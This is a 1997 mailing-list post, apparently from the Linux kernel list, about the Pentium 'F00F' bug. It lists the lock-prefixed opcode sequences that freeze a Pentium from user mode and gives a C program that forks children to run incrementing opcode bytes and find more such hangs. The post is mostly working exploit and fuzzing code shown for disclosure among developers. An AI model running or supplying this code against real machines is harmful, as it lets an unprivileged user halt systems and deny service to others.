More Pentium DEATH

Richard B. Johnson (root@chaos.analogic.com)
Fri, 7 Nov 1997 19:13:00 -0500 (EST)

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: AndroSyn: "Re: IDE BM-DMA on Dell GXPro"
Previous message: Gerhard Mack: "ugh?? what's an ugh."

The following simple program can be modified to find more illegal
opcodes that don't produce an illegal-opcode trap. These opcodes
allow a user to stop a Pentium machine.

The following illegal opcode strings have already been found.

0xf0, 0x0f, 0xc7, 0xc8
0xf0, 0x0f, 0xc7, 0xc9
0xf0, 0x0f, 0xc7, 0xca
0xf0, 0x0f, 0xc7, 0xcb
0xf0, 0x0f, 0xc7, 0xcc
0xf0, 0x0f, 0xc7, 0xcd
0xf0, 0x0f, 0xc7, 0xce
0xf0, 0x0f, 0xc7, 0xcf

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <wait.h>

unsigned char c[]={0xf0,0x0f,0x00,0x00,0x00};

main()
{
int i;
unsigned short *punch;
void(*f)() = (void *) c;
punch = (unsigned short *) &c[2];

for(;;)
{
(*punch)++;

#ifdef OPCODES_FOUND_SO_FAR

if(*punch == 0xc8c7)
(*punch)++;
if(*punch == 0xc9c7)
(*punch)++;
if(*punch == 0xcac7)
(*punch)++;
if(*punch == 0xcbc7)
(*punch)++;
if(*punch == 0xccc7)
(*punch)++;
if(*punch == 0xcdc7)
(*punch)++;
if(*punch == 0xcec7)
(*punch)++;
if(*punch == 0xcfc7)
(*punch)++;
#endif

switch(fork())
{
case 0:
fprintf(stdout, "Trying %02X %02X\n", c[2], c[3]);
fflush (stdout);
(*f)();
exit(0);
case -1:
fprintf(stderr, "Fork failed\n");
break;
default:
wait(&i);
}
}
}

Cheers,
Dick Johnson

Richard B. Johnson
Project Engineer
Analogic Corporation
Penguin : Linux version 2.1.60 on an i586 machine (66.15 BogoMips).
Warning : It's hard to remain at the trailing edge of technology.

Next message: AndroSyn: "Re: IDE BM-DMA on Dell GXPro"
Previous message: Gerhard Mack: "ugh?? what's an ugh."